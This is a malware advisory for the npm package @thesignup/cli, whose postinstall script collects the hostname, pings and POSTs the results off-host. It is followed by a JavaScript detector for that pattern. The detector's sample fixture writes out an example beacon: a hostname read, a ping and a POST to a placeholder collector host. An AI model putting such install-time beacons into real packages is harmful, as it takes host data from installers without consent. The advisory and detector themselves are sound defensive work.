@thesignup/cli @0.0.2
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-4456
Ecosystem: npm
Summary
The package's scripts/postinstall.cjs runs at install time and performs host reconnaissance (hostname collection, ping/network probing) and posts the results to a remote endpoint via HTTP POST. Lifecycle-time outbound network beacons that gather host identifiers and ship them off-host on npm install are an active-attack shape: every installer of this package becomes a data point for the operator, with no consent and no opt-out, and the beacon fires before the user has even had a chance to read the README. The structural fingerprint (postinstall + ping + hostname read + POST to a remote host) is the canonical install-time exfiltration pattern.
Source: amazon-inspector (ba2a0430ac2be1496dc77d4ad0a94d89bcf563d4aadb4eb457812b7572aa8367)
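
The fingerprint described in the summary (a lifecycle hook whose script reads the hostname, pings, and POSTs off-host) can be checked statically on an unpacked tarball before anything is installed. The following is an added example, not code from the advisory or from the package: `auditLifecycle`, `scriptPath`, the trait names, the sample package and the `.example.invalid` hosts are all constructed for illustration, and the regexes are a heuristic that obfuscated code will evade.

```javascript
// Added example: static check for the install-time beacon shape in the summary.
const LIFECYCLE = ['preinstall', 'install', 'postinstall'];

// Trait name -> pattern. Heuristic only; obfuscated code evades plain regexes.
const TRAITS = {
  hostnameRead: /\bos\.hostname\s*\(|process\.env\.(HOSTNAME|COMPUTERNAME)/,
  pingProbe: /\bping\b/,
  httpPost: /method\s*:\s*['"]POST['"]/i,
  childProcess: /require\(\s*['"](node:)?child_process['"]\s*\)/,
};

// Pull the script path out of a command such as "node scripts/postinstall.cjs".
function scriptPath(command) {
  const m = /\bnode\s+(?:--\S+\s+)*["']?([^\s"';&|]+\.(?:c|m)?js)/.exec(command);
  return m ? m[1].replace(/^\.\//, '') : null;
}

// pkg: parsed package.json; files: { relativePath: sourceText } from the tarball.
function auditLifecycle(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE) {
    const command = (pkg.scripts || {})[hook];
    if (!command) continue;
    const path = scriptPath(command);
    // Scan the referenced file when present, otherwise the inline command text.
    const source = path && files[path] !== undefined ? files[path] : command;
    const traits = Object.keys(TRAITS).filter((t) => TRAITS[t].test(source));
    // Host identifier read plus an outbound POST is the beacon shape.
    const beacon = traits.includes('hostnameRead') && traits.includes('httpPost');
    findings.push({ hook, command, path, traits, beacon });
  }
  return findings;
}

// Constructed sample input (not the real package contents).
const samplePkg = {
  name: 'sample-pkg',
  scripts: { postinstall: 'node scripts/postinstall.cjs', test: 'node test.js' },
};
const sampleFiles = {
  'scripts/postinstall.cjs': [
    "const os = require('os');",
    "const { execSync } = require('child_process');",
    "const host = os.hostname();",
    "execSync('ping -c 1 probe.example.invalid');",
    "require('https').request({ host: 'collector.example.invalid', method: 'POST' });",
  ].join('\n'),
};
console.log(JSON.stringify(auditLifecycle(samplePkg, sampleFiles), null, 2));
```

Installing with `npm install --ignore-scripts` keeps lifecycle hooks from running at all while a flagged package is reviewed.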